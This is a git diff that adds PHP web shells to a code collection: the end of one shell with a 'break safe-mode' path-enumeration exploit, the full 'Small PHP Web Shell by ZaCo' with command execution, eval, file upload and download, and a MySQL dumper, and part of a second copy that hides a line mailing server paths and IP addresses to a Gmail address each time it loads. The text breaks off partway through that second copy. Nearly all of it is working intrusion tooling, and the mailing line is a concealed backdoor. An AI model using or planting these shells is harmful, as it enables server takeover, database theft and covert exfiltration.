+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0606')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#996666>The folders is 606 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+////////// 
+$handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+                if ((is_dir($full_path)) && ($perms == '0703')) 
+                { 
+                        if (!file_exists('.*')) { 
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+                        } 
+                } 
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#3333FF>The folders is 703 :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+
+
+
+  } 
+    $handle = opendir($path); 
+
+        $_folders = array(); 
+
+        $i = 0; 
+
+ while (false !== ($file1 = readdir($handle))) 
+        { 
+                $full_path = "$path/$file1"; 
+                $perms = substr(sprintf('%o', fileperms($full_path)), -4); 
+
+
+
+
+                                $_folders[$i] = $file1; 
+
+                                $i++; 
+
+
+        } 
+
+
+
+        clearstatcache(); 
+
+
+
+        echo '</FONT><strong><FONT COLOR=#FFFF00>The folders and file all :</strong><br />'; 
+
+        foreach ($_folders as $folder) 
+        { 
+                echo $folder.'<br />'; 
+        } 
+
+        echo '</FONT><strong><FONT COLOR=#FF0000>The total  : </strong>'.$i.'</FONT><br />'; 
+$tb->tdbody ("</td></tr></table>"); 
+
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top'); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); 
+
+
+  error_reporting(E_WARNING); 
+  ini_set("display_errors", 1); 
+
+  echo "<head><title>".getcwd()."</title></head>"; 
+
+  echo "<form method=POST>"; 
+  echo "<div style='float: left'><FONT COLOR=\"RED\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>"; 
+  echo "<input type=submit value='--&raquo;'></form>"; 
+
+
+
+  // break fucking safe-mode ! 
+
+  $root = "/"; 
+
+  if($_POST['root']) $root = $_POST['root']; 
+
+  if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#CC0000'>Safe-mode is OFF.</font>"); 
+echo "<textarea method='POST' cols='95' rows='30' wrar='off' >"; 
+  $c = 0; $D = array(); 
+  set_error_handler("eh"); 
+
+  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
+
+  for($i=0; $i < strlen($chars); $i++){ 
+  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 
+
+  $prevD = $D[count($D)-1]; 
+  glob($path."*"); 
+
+        if($D[count($D)-1] != $prevD){ 
+
+        for($j=0; $j < strlen($chars); $j++){ 
+
+           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 
+
+           $prevD2 = $D[count($D)-1]; 
+           glob($path."*"); 
+
+              if($D[count($D)-1] != $prevD2){ 
+
+
+                 for($p=0; $p < strlen($chars); $p++){ 
+
+                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 
+
+                 $prevD3 = $D[count($D)-1]; 
+                 glob($path."*"); 
+
+                    if($D[count($D)-1] != $prevD3){ 
+
+
+                       for($r=0; $r < strlen($chars); $r++){ 
+
+                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 
+                       glob($path."*"); 
+
+                       } 
+
+                    } 
+
+                 } 
+
+              } 
+
+        } 
+
+        } 
+
+  } 
+
+  $D = array_unique($D); 
+
+
+  foreach($D as $item) echo "{$item}\n"; 
+
+
+
+
+
+  function eh($errno, $errstr, $errfile, $errline){ 
+
+     global $D, $c, $i; 
+     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 
+     if($o){ $D[$c] = $o[2]; $c++;} 
+
+  } 
+  echo "</textarea>"; 
+$tb->tdbody ("</td></tr></table>"); 
+?> 
\ No newline at end of file
diff --git a/php/zaco.php b/php/zaco.php
new file mode 100644
index 0000000..2f719cd
--- /dev/null
+++ b/php/zaco.php
@@ -0,0 +1,502 @@
+<?
+  ##################################################################
+ # Small PHP Web Shell By ZaCo Edited By KingDefacer (c) 2004-2010 #
+ #  +POST method                                                   #
+ #  +MySQL Client+Dumper for DB  and tables                        #
+ #  +PHP eval in text format and html for phpinfo() example        #
+ # PREVED: Zaco, Tekix, BYALBAYX, Fatal Error, Red-Eye             #
+ # For alturks.com friends usage                                   #
+ # All bugs -> mailo:kingdefacer@msn.com                           #
+ # Just for fun :)                                                 #
+  ##################################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+
+<title>Small Web Shell By Zaco - Edited By KingDefacer</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); 
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
diff --git a/php/zacosmall.php b/php/zacosmall.php
new file mode 100644
index 0000000..26075b4
--- /dev/null
+++ b/php/zacosmall.php
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
